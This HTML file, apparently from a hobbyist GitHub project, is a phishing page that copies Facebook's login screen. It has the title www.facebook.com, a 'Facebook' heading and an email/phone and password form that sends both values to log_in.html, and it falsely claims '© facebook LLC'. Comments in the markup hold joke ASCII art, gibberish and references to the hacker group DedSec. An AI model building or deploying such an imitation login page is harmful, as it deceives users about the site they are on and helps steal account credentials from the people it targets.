<!DOCTYPE html>
<!--github tinashe76-->
<html>
	<head>
		<title>www.facebook.com</title><!--
         I LOVE METH, I MEAN MATH


		 |???????????????????????\			|----------	   ____
		 |                        \         |   ____   \   |   |     |---|  |---\    |___           |---|
		 |     |     |     |       \        |  |        |  |   |     |   |  |    \   |  |  |------| |   |       ---- 
		 |     |     |     |    |   \       |  |____    |  |   |     |   |  |  |\ \  |  |  | |----| |   |       |   |
 		 |     |     |     |    |    \      |   _______/    \   \---/    /  |  | \ \-|  |  | |____  |   --------|   |
		 |_____|_____|_____|____|     |     |  |             ------------   |  |  \_____|  |______| |    _PUNCH_    |
					   |           /        |__|                                                    |   |       |   |
					   |__________/               |                                                 -----       -----
                                      |




				-->
		<meta charset="UTF-8">
		<!--

		-->
		<meta name="view-port" content="width=device-width, initial-scale=1.0">
		<link href="assets/styles.css" type="text/css" rel="stylesheet">
		<script src="assets/scipts.js"></script>
	</head>
	<body>
		<center>
			<!--Remember to use a technique that isn't sketchy-->
			<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
			<div>
				<h2>Face<!--
					gdgqiwdgqkbdquigquiqddhdhqWelcome to cdesic dvbudv The World just LAUGHED

					(/+ _ +) FINN THE HUMAN	-->book</h2>
				<form action="log_in.html" method="get">
					<input class="form" type="text" name="username" placeholder="Email or Phone Number" size="30"><br />
					<input class="form" type="password" name="password" placeholder="Password" maxlength="24" size="30"><br /><br />
					<!--Remember to fix facebook issue-->
					<input id="submit" type="submit" name="submit" value="Login">
				</form>
			</div>
			<br /><br />
			<!--
               @DEDSEC--------------------------------------------------NOW PRINTING FACEBOOK AT NO EXTRA CHARGE!
			
			What is this that I'm hearing, Rogue Affiliation???????
			--><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
			<footer>
				<p>&#169;<!--

				-->&nbsp;facebook LLC. All rights reserved</p>
			</footer>
		</center>
	</body>
</html>